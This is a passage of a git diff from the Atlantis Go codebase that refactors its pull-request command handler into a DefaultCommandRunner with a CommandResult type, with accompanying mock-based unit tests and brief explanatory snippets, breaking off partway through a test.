-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events_test
-
-import (
- "bytes"
- "errors"
- "log"
- "strings"
- "testing"
-
- "github.com/google/go-github/github"
- . "github.com/petergtz/pegomock"
- "github.com/runatlantis/atlantis/server/events"
- "github.com/runatlantis/atlantis/server/events/mocks"
- "github.com/runatlantis/atlantis/server/events/mocks/matchers"
- "github.com/runatlantis/atlantis/server/events/models"
- "github.com/runatlantis/atlantis/server/events/models/fixtures"
- "github.com/runatlantis/atlantis/server/events/vcs"
- vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
- logmocks "github.com/runatlantis/atlantis/server/logging/mocks"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var applier *mocks.MockExecutor
-var planner *mocks.MockExecutor
-var eventParsing *mocks.MockEventParsing
-var vcsClient *vcsmocks.MockClientProxy
-var ghStatus *mocks.MockCommitStatusUpdater
-var githubGetter *mocks.MockGithubPullGetter
-var gitlabGetter *mocks.MockGitlabMergeRequestGetter
-var workspaceLocker *mocks.MockAtlantisWorkspaceLocker
-var ch events.CommandHandler
-var logBytes *bytes.Buffer
-
-func setup(t *testing.T) {
- RegisterMockTestingT(t)
- applier = mocks.NewMockExecutor()
- planner = mocks.NewMockExecutor()
- eventParsing = mocks.NewMockEventParsing()
- ghStatus = mocks.NewMockCommitStatusUpdater()
- workspaceLocker = mocks.NewMockAtlantisWorkspaceLocker()
- vcsClient = vcsmocks.NewMockClientProxy()
- githubGetter = mocks.NewMockGithubPullGetter()
- gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
- logger := logmocks.NewMockSimpleLogging()
- logBytes = new(bytes.Buffer)
- When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
- ch = events.CommandHandler{
- PlanExecutor: planner,
- ApplyExecutor: applier,
- VCSClient: vcsClient,
- CommitStatusUpdater: ghStatus,
- EventParser: eventParsing,
- AtlantisWorkspaceLocker: workspaceLocker,
- MarkdownRenderer: &events.MarkdownRenderer{},
- GithubPullGetter: githubGetter,
- GitlabMergeRequestGetter: gitlabGetter,
- Logger: logger,
- AllowForkPRs: false,
- AllowForkPRsFlag: "allow-fork-prs-flag",
- }
-}
-
-func TestExecuteCommand_LogPanics(t *testing.T) {
- t.Log("if there is a panic it is commented back on the pull request")
- setup(t)
- ch.AllowForkPRs = true // Lets us get to the panic code.
- defer func() { ch.AllowForkPRs = false }()
- When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, nil)).ThenPanic("panic")
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil)
- _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
- Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
-}
-
-func TestExecuteCommand_NoGithubPullGetter(t *testing.T) {
- t.Log("if CommandHandler was constructed with a nil GithubPullGetter an error should be logged")
- setup(t)
- ch.GithubPullGetter = nil
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, 1, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
-}
-
-func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) {
- t.Log("if CommandHandler was constructed with a nil GitlabMergeRequestGetter an error should be logged")
- setup(t)
- ch.GitlabMergeRequestGetter = nil
- ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, 1, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
-}
-
-func TestExecuteCommand_GithubPullErr(t *testing.T) {
- t.Log("if getting the github pull request fails an error should be logged")
- setup(t)
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) {
- t.Log("if getting the gitlab merge request fails an error should be logged")
- setup(t)
- When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
- ch.ExecuteCommand(fixtures.GitlabRepo, fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_GithubPullParseErr(t *testing.T) {
- t.Log("if parsing the returned github pull request fails an error should be logged")
- setup(t)
- var pull github.PullRequest
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
- When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err"))
-
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
- Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
-}
-
-func TestExecuteCommand_ForkPRDisabled(t *testing.T) {
- t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
- " comment saying that this is not allowed")
- setup(t)
- ch.AllowForkPRs = false // by default it's false so don't need to reset
- var pull github.PullRequest
- modelPull := models.PullRequest{State: models.Open}
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-
- headRepo := fixtures.GithubRepo
- headRepo.FullName = "forkrepo/atlantis"
- headRepo.Owner = "forkrepo"
- When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil)
-
- ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, nil)
- vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
-}
-
-func TestExecuteCommand_ClosedPull(t *testing.T) {
- t.Log("if a command is run on a closed pull request atlantis should" +
- " comment saying that this is not allowed")
- setup(t)
- pull := &github.PullRequest{
- State: github.String("closed"),
- }
- modelPull := models.PullRequest{State: models.Closed}
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
- When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil)
-
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
- vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
-}
-
-func TestExecuteCommand_WorkspaceLocked(t *testing.T) {
- t.Log("if the workspace is locked, should comment back on the pull")
- setup(t)
- pull := &github.PullRequest{
- State: github.String("closed"),
- }
- cmd := events.Command{
- Name: events.Plan,
- Workspace: "workspace",
- }
-
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
- When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
- When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false)
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
- msg := "The workspace workspace is currently locked by another" +
- " command that is running for this pull request." +
- " Wait until the previous command is complete and try again."
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
- _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
- Equals(t, msg, response.Failure)
- vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num,
- "**Plan Failed**: "+msg+"\n\n")
-}
-
-func TestExecuteCommand_FullRun(t *testing.T) {
- t.Log("when running a plan, apply should comment")
- pull := &github.PullRequest{
- State: github.String("closed"),
- }
- cmdResponse := events.CommandResponse{}
- for _, c := range []events.CommandName{events.Plan, events.Apply} {
- setup(t)
- cmd := events.Command{
- Name: c,
- Workspace: "workspace",
- }
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
- When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
- When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
- switch c {
- case events.Plan:
- When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
- case events.Apply:
- When(applier.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
- }
-
- ch.ExecuteCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
- _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
- Equals(t, cmdResponse, response)
- vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
- workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
- }
-}
-
-func TestExecuteCommand_ForkPREnabled(t *testing.T) {
- t.Log("when running a plan on a fork PR, it should succeed")
- setup(t)
-
- // Enable forked PRs.
- ch.AllowForkPRs = true
- defer func() { ch.AllowForkPRs = false }() // Reset after test.
-
- var pull github.PullRequest
- cmdResponse := events.CommandResponse{}
- cmd := events.Command{
- Name: events.Plan,
- Workspace: "workspace",
- }
- When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
- headRepo := fixtures.GithubRepo
- headRepo.FullName = "forkrepo/atlantis"
- headRepo.Owner = "forkrepo"
- When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
- When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
- When(planner.Execute(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-
- ch.ExecuteCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
-
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
- _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResponse()).GetCapturedArguments()
- Equals(t, cmdResponse, response)
- vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
- workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-}
diff --git a/server/events/command_response.go b/server/events/command_response.go
deleted file mode 100644
index abba3897b4..0000000000
--- a/server/events/command_response.go
+++ /dev/null
@@ -1,21 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-// CommandResponse is the result of running a Command.
-type CommandResponse struct {
- Error error
- Failure string
- ProjectResults []ProjectResult
-}
diff --git a/server/events/command_result.go b/server/events/command_result.go
new file mode 100644
index 0000000000..ff767ddb58
--- /dev/null
+++ b/server/events/command_result.go
@@ -0,0 +1,21 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+// CommandResult is the result of running a Command.
+type CommandResult struct {
+ Error error
+ Failure string
+ ProjectResults []ProjectResult
+}
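
Error and Failure are distinct on purpose: Failure carries an expected, user-facing condition, while Error marks an unexpected problem, and DefaultCommandRunner.updatePull (below) logs them at different levels. Two illustrative values:

    // An expected failure: reported back to the user and logged as a warning.
    res := events.CommandResult{Failure: "workspace is currently locked"}

    // An unexpected error: logged at the error level.
    res = events.CommandResult{Error: errors.New("building plan command")}
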
diff --git a/server/events/command_runner.go b/server/events/command_runner.go
new file mode 100644
index 0000000000..04fbb7f129
--- /dev/null
+++ b/server/events/command_runner.go
@@ -0,0 +1,255 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events
+
+import (
+ "fmt"
+
+ "github.com/google/go-github/github"
+ "github.com/lkysow/go-gitlab"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ "github.com/runatlantis/atlantis/server/logging"
+ "github.com/runatlantis/atlantis/server/recovery"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_command_runner.go CommandRunner
+
+// CommandRunner is the first step after a command request has been parsed.
+type CommandRunner interface {
+ // RunCommentCommand is the first step after a command request has been parsed.
+ // It handles gathering additional information needed to execute the command
+ // and then calling the appropriate services to finish executing the command.
+ RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand)
+ RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User)
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_github_pull_getter.go GithubPullGetter
+
+// GithubPullGetter makes API calls to get pull requests.
+type GithubPullGetter interface {
+ // GetPullRequest gets the pull request with id pullNum for the repo.
+ GetPullRequest(repo models.Repo, pullNum int) (*github.PullRequest, error)
+}
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_merge_request_getter.go GitlabMergeRequestGetter
+
+// GitlabMergeRequestGetter makes API calls to get merge requests.
+type GitlabMergeRequestGetter interface {
+ // GetMergeRequest gets the merge request with the id pullNum for the repo.
+ GetMergeRequest(repoFullName string, pullNum int) (*gitlab.MergeRequest, error)
+}
+
+// DefaultCommandRunner is the first step when processing a comment command.
+type DefaultCommandRunner struct {
+ VCSClient vcs.ClientProxy
+ GithubPullGetter GithubPullGetter
+ GitlabMergeRequestGetter GitlabMergeRequestGetter
+ CommitStatusUpdater CommitStatusUpdater
+ EventParser EventParsing
+ MarkdownRenderer *MarkdownRenderer
+ Logger logging.SimpleLogging
+ // AllowForkPRs controls whether we operate on pull requests from forks.
+ AllowForkPRs bool
+ // AllowForkPRsFlag is the name of the flag that controls fork PRs. We use
+ // this in our error message back to the user on a forked PR so they know
+ // how to enable this functionality.
+ AllowForkPRsFlag string
+ ProjectCommandBuilder ProjectCommandBuilder
+ ProjectCommandRunner ProjectCommandRunner
+}
+
+func (c *DefaultCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) {
+ log := c.buildLogger(baseRepo.FullName, pull.Num)
+ ctx := &CommandContext{
+ User: user,
+ Log: log,
+ Pull: pull,
+ HeadRepo: headRepo,
+ BaseRepo: baseRepo,
+ }
+ defer c.logPanics(ctx)
+ if !c.validateCtxAndComment(ctx) {
+ return
+ }
+ if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, Plan); err != nil {
+ ctx.Log.Warn("unable to update commit status: %s", err)
+ }
+
+ projectCmds, err := c.ProjectCommandBuilder.BuildAutoplanCommands(ctx)
+ if err != nil {
+ c.updatePull(ctx, AutoplanCommand{}, CommandResult{Error: err})
+ return
+ }
+
+ var results []ProjectResult
+ for _, cmd := range projectCmds {
+ res := c.ProjectCommandRunner.Plan(cmd)
+ results = append(results, ProjectResult{
+ ProjectCommandResult: res,
+ RepoRelDir: cmd.RepoRelDir,
+ Workspace: cmd.Workspace,
+ })
+ }
+ c.updatePull(ctx, AutoplanCommand{}, CommandResult{ProjectResults: results})
+}
+
+// RunCommentCommand executes the command.
+// We take in a pointer for maybeHeadRepo because for some events there isn't
+// enough data to construct the Repo model and callers might want to wait until
+// the event is further validated before making an additional (potentially
+// wasteful) call to get the necessary data.
+func (c *DefaultCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *CommentCommand) {
+ log := c.buildLogger(baseRepo.FullName, pullNum)
+ var headRepo models.Repo
+ if maybeHeadRepo != nil {
+ headRepo = *maybeHeadRepo
+ }
+
+ var err error
+ var pull models.PullRequest
+ switch baseRepo.VCSHost.Type {
+ case models.Github:
+ pull, headRepo, err = c.getGithubData(baseRepo, pullNum)
+ case models.Gitlab:
+ pull, err = c.getGitlabData(baseRepo, pullNum)
+ default:
+ err = errors.New("Unknown VCS type, this is a bug!")
+ }
+ if err != nil {
+ log.Err(err.Error())
+ return
+ }
+ ctx := &CommandContext{
+ User: user,
+ Log: log,
+ Pull: pull,
+ HeadRepo: headRepo,
+ BaseRepo: baseRepo,
+ }
+ defer c.logPanics(ctx)
+
+ if !c.validateCtxAndComment(ctx) {
+ return
+ }
+
+ if err := c.CommitStatusUpdater.Update(ctx.BaseRepo, ctx.Pull, vcs.Pending, cmd.CommandName()); err != nil {
+ ctx.Log.Warn("unable to update commit status: %s", err)
+ }
+
+ var result ProjectCommandResult
+ switch cmd.Name {
+ case Plan:
+ projectCmd, err := c.ProjectCommandBuilder.BuildPlanCommand(ctx, cmd)
+ if err != nil {
+ c.updatePull(ctx, cmd, CommandResult{Error: err})
+ return
+ }
+ result = c.ProjectCommandRunner.Plan(projectCmd)
+ case Apply:
+ projectCmd, err := c.ProjectCommandBuilder.BuildApplyCommand(ctx, cmd)
+ if err != nil {
+ c.updatePull(ctx, cmd, CommandResult{Error: err})
+ return
+ }
+ result = c.ProjectCommandRunner.Apply(projectCmd)
+ default:
+ ctx.Log.Err("failed to determine desired command, neither plan nor apply")
+ return
+ }
+
+ c.updatePull(
+ ctx,
+ cmd,
+ CommandResult{
+ ProjectResults: []ProjectResult{{
+ RepoRelDir: cmd.RepoRelDir,
+ Workspace: cmd.Workspace,
+ ProjectCommandResult: result,
+ }}})
+}
+
+func (c *DefaultCommandRunner) getGithubData(baseRepo models.Repo, pullNum int) (models.PullRequest, models.Repo, error) {
+ if c.GithubPullGetter == nil {
+ return models.PullRequest{}, models.Repo{}, errors.New("Atlantis not configured to support GitHub")
+ }
+ ghPull, err := c.GithubPullGetter.GetPullRequest(baseRepo, pullNum)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, errors.Wrap(err, "making pull request API call to GitHub")
+ }
+ pull, _, headRepo, err := c.EventParser.ParseGithubPull(ghPull)
+ if err != nil {
+ return pull, headRepo, errors.Wrap(err, "extracting required fields from comment data")
+ }
+ return pull, headRepo, nil
+}
+
+func (c *DefaultCommandRunner) getGitlabData(baseRepo models.Repo, pullNum int) (models.PullRequest, error) {
+ if c.GitlabMergeRequestGetter == nil {
+ return models.PullRequest{}, errors.New("Atlantis not configured to support GitLab")
+ }
+ mr, err := c.GitlabMergeRequestGetter.GetMergeRequest(baseRepo.FullName, pullNum)
+ if err != nil {
+ return models.PullRequest{}, errors.Wrap(err, "making merge request API call to GitLab")
+ }
+ pull := c.EventParser.ParseGitlabMergeRequest(mr, baseRepo)
+ return pull, nil
+}
+
+func (c *DefaultCommandRunner) buildLogger(repoFullName string, pullNum int) *logging.SimpleLogger {
+ src := fmt.Sprintf("%s#%d", repoFullName, pullNum)
+ return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel())
+}
+
+func (c *DefaultCommandRunner) validateCtxAndComment(ctx *CommandContext) bool {
+ if !c.AllowForkPRs && ctx.HeadRepo.Owner != ctx.BaseRepo.Owner {
+ ctx.Log.Info("command was run on a fork pull request which is disallowed")
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, fmt.Sprintf("Atlantis commands can't be run on fork pull requests. To enable, set --%s", c.AllowForkPRsFlag)) // nolint: errcheck
+ return false
+ }
+
+ if ctx.Pull.State != models.Open {
+ ctx.Log.Info("command was run on closed pull request")
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, "Atlantis commands can't be run on closed pull requests") // nolint: errcheck
+ return false
+ }
+ return true
+}
+
+func (c *DefaultCommandRunner) updatePull(ctx *CommandContext, command CommandInterface, res CommandResult) {
+ // Log if we got any errors or failures.
+ if res.Error != nil {
+ ctx.Log.Err(res.Error.Error())
+ } else if res.Failure != "" {
+ ctx.Log.Warn(res.Failure)
+ }
+
+ // Update the pull request's status icon and comment back.
+ if err := c.CommitStatusUpdater.UpdateProjectResult(ctx, command.CommandName(), res); err != nil {
+ ctx.Log.Warn("unable to update commit status: %s", err)
+ }
+ comment := c.MarkdownRenderer.Render(res, command.CommandName(), ctx.Log.History.String(), command.IsVerbose(), command.IsAutoplan())
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, comment) // nolint: errcheck
+}
+
+// logPanics logs and creates a comment on the pull request for panics.
+func (c *DefaultCommandRunner) logPanics(ctx *CommandContext) {
+ if err := recover(); err != nil {
+ stack := recovery.Stack(3)
+ c.VCSClient.CreateComment(ctx.BaseRepo, ctx.Pull.Num, // nolint: errcheck
+ fmt.Sprintf("**Error: goroutine panic. This is a bug.**\n```\n%s\n%s```", err, stack))
+ ctx.Log.Err("PANIC: %s\n%s", err, stack)
+ }
+}
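
A sketch of how the two entry points are expected to be driven (the surrounding controller wiring is assumed and not part of this diff):

    // On a pull request opened/updated event, plan automatically.
    runner.RunAutoplanCommand(baseRepo, headRepo, pull, user)

    // On a comment command such as "atlantis plan -d child/dir". Some webhook
    // payloads don't carry enough data to build the head repo, so callers may
    // pass nil; the runner then fetches the pull request (and, on GitHub, the
    // head repo) via the VCS API.
    runner.RunCommentCommand(baseRepo, nil, user, pullNum, parseResult.Command)
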
diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
new file mode 100644
index 0000000000..0b1518c09c
--- /dev/null
+++ b/server/events/command_runner_test.go
@@ -0,0 +1,211 @@
+// Copyright 2017 HootSuite Media Inc.
+//
+// Licensed under the Apache License, Version 2.0 (the License);
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+// http://www.apache.org/licenses/LICENSE-2.0
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an AS IS BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+// Modified hereafter by contributors to runatlantis/atlantis.
+//
+package events_test
+
+import (
+ "bytes"
+ "errors"
+ "log"
+ "strings"
+ "testing"
+
+ "github.com/google/go-github/github"
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/models/fixtures"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+ logmocks "github.com/runatlantis/atlantis/server/logging/mocks"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+var projectCommandBuilder *mocks.MockProjectCommandBuilder
+var eventParsing *mocks.MockEventParsing
+var vcsClient *vcsmocks.MockClientProxy
+var ghStatus *mocks.MockCommitStatusUpdater
+var githubGetter *mocks.MockGithubPullGetter
+var gitlabGetter *mocks.MockGitlabMergeRequestGetter
+var ch events.DefaultCommandRunner
+var logBytes *bytes.Buffer
+
+func setup(t *testing.T) {
+ RegisterMockTestingT(t)
+ projectCommandBuilder = mocks.NewMockProjectCommandBuilder()
+ eventParsing = mocks.NewMockEventParsing()
+ ghStatus = mocks.NewMockCommitStatusUpdater()
+ vcsClient = vcsmocks.NewMockClientProxy()
+ githubGetter = mocks.NewMockGithubPullGetter()
+ gitlabGetter = mocks.NewMockGitlabMergeRequestGetter()
+ logger := logmocks.NewMockSimpleLogging()
+ logBytes = new(bytes.Buffer)
+ projectCommandRunner := mocks.NewMockProjectCommandRunner()
+ When(logger.Underlying()).ThenReturn(log.New(logBytes, "", 0))
+ ch = events.DefaultCommandRunner{
+ VCSClient: vcsClient,
+ CommitStatusUpdater: ghStatus,
+ EventParser: eventParsing,
+ MarkdownRenderer: &events.MarkdownRenderer{},
+ GithubPullGetter: githubGetter,
+ GitlabMergeRequestGetter: gitlabGetter,
+ Logger: logger,
+ AllowForkPRs: false,
+ AllowForkPRsFlag: "allow-fork-prs-flag",
+ ProjectCommandBuilder: projectCommandBuilder,
+ ProjectCommandRunner: projectCommandRunner,
+ }
+}
+
+func TestRunCommentCommand_LogPanics(t *testing.T) {
+ t.Log("if there is a panic it is commented back on the pull request")
+ setup(t)
+ ch.AllowForkPRs = true // Lets us get to the panic code.
+ defer func() { ch.AllowForkPRs = false }()
+ When(ghStatus.Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, events.Plan)).ThenPanic("panic")
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+ _, _, comment := vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()).GetCapturedArguments()
+ Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic")
+}
+
+func TestRunCommentCommand_NoGithubPullGetter(t *testing.T) {
+ t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged")
+ setup(t)
+ ch.GithubPullGetter = nil
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, 1, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String())
+}
+
+func TestRunCommentCommand_NoGitlabMergeGetter(t *testing.T) {
+ t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged")
+ setup(t)
+ ch.GitlabMergeRequestGetter = nil
+ ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, 1, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String())
+}
+
+func TestRunCommentCommand_GithubPullErr(t *testing.T) {
+ t.Log("if getting the github pull request fails an error should be logged")
+ setup(t)
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String())
+}
+
+func TestRunCommentCommand_GitlabMergeRequestErr(t *testing.T) {
+ t.Log("if getting the gitlab merge request fails an error should be logged")
+ setup(t)
+ When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err"))
+ ch.RunCommentCommand(fixtures.GitlabRepo, &fixtures.GitlabRepo, fixtures.User, fixtures.Pull.Num, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String())
+}
+
+func TestRunCommentCommand_GithubPullParseErr(t *testing.T) {
+ t.Log("if parsing the returned github pull request fails an error should be logged")
+ setup(t)
+ var pull github.PullRequest
+ When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+ When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GitlabRepo, errors.New("err"))
+
+ ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
+ Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
+}
+
+func TestRunCommentCommand_ForkPRDisabled(t *testing.T) {
+ t.Log("if a command is run on a forked pull request and this is disabled atlantis should" +
+ " comment saying that this is not allowed")
+ setup(t)
